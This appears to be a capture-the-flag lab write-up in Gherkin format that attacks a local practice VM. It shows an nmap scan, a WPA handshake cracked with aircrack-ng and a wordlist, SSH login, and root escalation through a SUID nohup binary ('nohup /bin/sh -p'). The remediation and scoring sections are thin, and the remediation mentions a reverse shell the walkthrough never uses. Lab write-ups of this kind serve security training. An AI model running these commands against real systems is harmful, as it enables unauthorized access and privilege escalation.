## Version 1.4.1
## language: en

Feature:
  TOE:
    victim01
  Location:
    http://192.168.0.10:80/
  CWE:
    CWE-0269: Improper Privilege Management
    CWE-0266: Incorrect Privilege Assignment
  Rule:
    Rule.173 Discard unsafe inputs
  Goal:
    get root access
  Recommendation:
    Use the principle of least privilege

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    """
    $ sudo nmap -p- -A 192.168.0.10
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-14 12:41 EST
    Nmap scan report for bossplayers (192.168.0.10)
    Host is up (0.0019s latency).
    Not shown: 65530 filtered ports
    PORT   STATE SERVICE VERSION
    22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
    | ssh-hostkey:
    |   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
    |   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
    |_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
    80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: 403 Forbidden
    8080/tcp open  http    BusyBox httpd 1.13
    |_http-title: 404 Not Found
    8999/tcp open  http    WebFS httpd 1.21
    |_http-server-header: webfs/1.21
    |_http-title: 0.0.0.0:8999/
    9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
    |_http-title: Uncaught Exception: MissingDatabaseExtensionException
    MAC Address: 08:00:27:09:7C:69 (Oracle VirtualBox virtual NIC)
    Aggressive OS guesses: Linux 2.6.32 (93%),
    Linux 3.10 (93%), Linux 3.10 - 4.11 (93%), Linux 3.2 - 4.9 (93%),
    Linux 3.4 - 3.10 (93%), Linux 2.6.32 - 3.10 (92%),
    Linux 2.6.32 - 3.13 (92%), Synology DiskStation Manager 5.2-5644 (91%),
    Linux 2.6.22 - 2.6.36 (89%), Linux 2.6.39 (89%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT     ADDRESS
    1   1.92 ms victim01 (192.168.0.10)

    OS and Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 142.22 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.10:80/
    And the homepage is displayed [evidences](02.png)
    """
    No configuration file found and no installation code available. Exiting...
    """

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the scan with the NMAP tool identifies several open ports
    Then I access port 8999 from the web browser [evidences](03.png)
    And I find a WPA-01.cap file and it opens with the aircrack-ng tool
    """
    aircrack-ng WPA-01.cap

    Reading packets, please wait...
    Opening WPA-01.cap
    Read 1918 packets.

       #  BSSID              ESSID                     Encryption

       1  5C:D9:98:5A:B6:62  dlink                     WPA (1 handshake)

    Choosing first network as target.

    Reading packets, please wait...
    Opening WPA-01.cap
    Read 1918 packets.

    1 potential targets

    Please specify a dictionary (option -w).
    """
    Given the WPA encryption
    Then I perform a brute force attack by aircrack-ng
    """
    aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt

    Reading packets, please wait...
    Opening WPA-01.cap
    Read 1918 packets.

       #  BSSID              ESSID                     Encryption

       1  5C:D9:98:5A:B6:62  dlink                     WPA (1 handshake)

    Choosing first network as target.

    Reading packets, please wait...
    Opening WPA-01.cap
    Read 1918 packets.

    1 potential targets

                                       Aircrack-ng 1.6
          [00:01:25] 84218/14344392 keys tested (1000.04 k/s)

          Time left: 3 hours, 57 minutes, 40 seconds                 0.59%

                               KEY FOUND! [ p4ssword ]


          Master Key     : 8F C0 1B 1B 85 06 0B 85 23 7C 83 74 F8 4B 4A FD
                           50 CE EC 72 6F 85 17 5F B1 14 5E D2 F2 47 5D 1A

          Transient Key  : 79 CE 15 5F 1A 2C DE 03 A8 2B 52 68 64 D3 77 A7
                           E4 FF CD 49 0C ED E9 5E 3B 68 E6 83 26 06 0C 98
                           8D 43 B6 7C E4 FE ED 2E 45 90 0D 6D 15 3A 3A 11
                           6C 28 C0 E1 30 92 1B 84 A5 C5 67 3A 47 01 B4 1C

          EAPOL HMAC     : 33 A5 CE E2 46 DB 4B 96 86 A1 6E D9 D2 A2 A6 E9
    """
    When I find the password login via SSH
    Then no util file is observed and login user is not root

  Scenario: Exploitation
    Given the start of SSH session
    Then I use the command to list the commands allowed by the current user
    """
    $ find / -perm -4000 -type f 2>/dev/null
    """
    Given the results I observe the command "/usr/bin/nohup"
    Then I perform a validation to scale privileges using nohup
    """
    nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
    cd /root
    cat flag.txt
    """
    Then I cant read the flag [evidences](04.png)

  Scenario: Remediation
    Given the vulnerabilities, it is necessary to restrict port 8999
    Then redirect queries to avoid the download of files from the server
    And in that case also avoid exploitation by using a reverse shell

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7/10 (high) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.6/10 (medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-15
